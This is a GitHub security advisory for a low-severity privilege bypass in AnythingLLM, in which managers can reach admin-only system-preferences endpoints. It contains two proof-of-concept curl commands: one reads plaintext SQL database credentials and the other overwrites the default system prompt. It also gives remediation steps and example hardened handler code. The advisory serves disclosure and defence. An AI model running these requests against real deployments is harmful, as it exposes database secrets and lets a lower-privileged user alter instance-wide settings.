
Manager Privilege Bypass Allows Access to Admin-Only System Preferences

Low
timothycarambat published GHSA-wfq3-65gm-3g2p Mar 13, 2026

Package

anything-llm (Docker)

Affected versions

<= 1.11.1 (Git commit: `e7ebeb47`)

Patched versions

732eac6fa89f43288bbb65ecc6298ebcd96b7aeb, >1.11.1

Description

Summary

The two generic system-preferences endpoints allow manager role access, while every other surface that touches the same settings is restricted to admin only. Because of this inconsistency, a manager can call the generic endpoints directly to read plaintext SQL database credentials and overwrite admin-only global settings such as the default system prompt and the Community Hub API key.

Details

The authorization gap:

| Surface | Allowed roles |
| --- | --- |
| Frontend `/settings/agents` | admin only (`AdminRoute`) |
| `POST /system/default-system-prompt` | admin only |
| `GET/POST /community-hub/settings` | admin only |
| `GET /admin/system-preferences-for` | admin + manager |
| `POST /admin/system-preferences` | admin + manager |

Read path: `agent_sql_connections` is in `publicFields`. The getter returns the parsed connection details (username, password, host, port, database) in plaintext.

Write path: `updateSettings()` checks `supportedFields` but does not enforce `protectedFields`. Both `default_system_prompt` and `hub_api_key` are in `supportedFields`, so a manager can overwrite them.

PoC

Preconditions:

- Multi-user mode enabled
- Attacker has a manager account

1: Read SQL connector credentials

```shell
curl -i -sS \
  -H "Authorization: Bearer <manager-jwt>" \
  "<base-url>/api/admin/system-preferences-for?labels=agent_sql_connections"
```

Expected result (if SQL connectors are configured):

```json
{
  "settings": {
    "agent_sql_connections": [{
      "username": "db_admin",
      "password": "s3cretP@ssw0rd",
      "host": "internal-db.example.com",
      "port": "5432",
      "database": "production"
    }]
  }
}
```

2: Modify an admin-only setting

```shell
curl -i -sS \
  -X POST "<base-url>/api/admin/system-preferences" \
  -H "Authorization: Bearer <manager-jwt>" \
  -H "Content-Type: application/json" \
  --data '{"default_system_prompt":"CANARY_MANAGER_BYPASS"}'
```

Expected result:

```json
{"success":true,"error":null}
```

A subsequent read of default_system_prompt reflects the canary value, confirming the setting was changed even though the dedicated write route for that setting is admin-only.

Impact

A manager can read plaintext SQL database credentials and modify global admin-only settings (default system prompt, Community Hub API key) that affect the entire instance.

Suggestion

  1. Restrict both /admin/system-preferences-for and /admin/system-preferences to ROLES.admin only, matching the dedicated write routes and frontend gating.
  2. Have updateSettings() reject keys present in protectedFields, not just accept keys in supportedFields, as defense-in-depth.
  3. Remove agent_sql_connections from publicFields and serve it through a dedicated admin-only endpoint.
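To make the gap and the fix concrete, here is an added example (not AnythingLLM's own code) modelling the generic `POST /admin/system-preferences` handler: the vulnerable variant admits managers and consults only `supportedFields`, while the hardened variant applies suggestions 1 and 2 above. The `ROLES` object, the handler shapes and the `max_workspace_uploads` key are assumptions; the other field names come from the advisory.

```javascript
// Added example modelling the authorization gap described in this advisory.
// ROLES, the handler shape and "max_workspace_uploads" are assumptions.
const ROLES = { admin: "admin", manager: "manager", default: "default" };

// Keys the generic endpoint accepts at all (per the advisory, includes admin-only ones).
const supportedFields = new Set([
  "default_system_prompt",
  "hub_api_key",
  "max_workspace_uploads", // hypothetical key a manager may legitimately change
]);

// Keys that only the dedicated admin-only routes should ever write.
const protectedFields = new Set(["default_system_prompt", "hub_api_key"]);

// Vulnerable behaviour: only supportedFields is consulted, protectedFields is ignored.
function updateSettingsVulnerable(updates) {
  const applied = Object.keys(updates).filter((k) => supportedFields.has(k));
  return { success: true, error: null, applied, rejected: [] };
}

// Hardened behaviour (suggestion 2): protected keys are rejected outright,
// regardless of which route or caller reached this function.
function updateSettingsHardened(updates) {
  const applied = [];
  const rejected = [];
  for (const key of Object.keys(updates)) {
    if (!supportedFields.has(key) || protectedFields.has(key)) rejected.push(key);
    else applied.push(key);
  }
  if (rejected.length > 0) {
    return { success: false, error: `rejected keys: ${rejected.join(", ")}`, applied, rejected };
  }
  return { success: true, error: null, applied, rejected };
}

// Route-level gate. Suggestion 1 narrows the generic endpoint to ROLES.admin,
// matching the dedicated write routes and the frontend AdminRoute gating.
function handlePreferencesPost(user, body, { hardened = true } = {}) {
  const allowedRoles = hardened ? [ROLES.admin] : [ROLES.admin, ROLES.manager];
  if (!allowedRoles.includes(user.role)) {
    return { status: 403, body: { success: false, error: "forbidden" } };
  }
  const result = hardened ? updateSettingsHardened(body) : updateSettingsVulnerable(body);
  return { status: result.success ? 200 : 400, body: result };
}
```

With `hardened: false` the manager's canary write succeeds exactly as in the PoC; with the defaults the manager is refused at the route, and even an admin hitting the generic endpoint is steered to the dedicated route for protected keys.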

Severity

Low


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

Vector string: `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N`

CVE ID

CVE-2026-32715

Weaknesses

No CWEs

Credits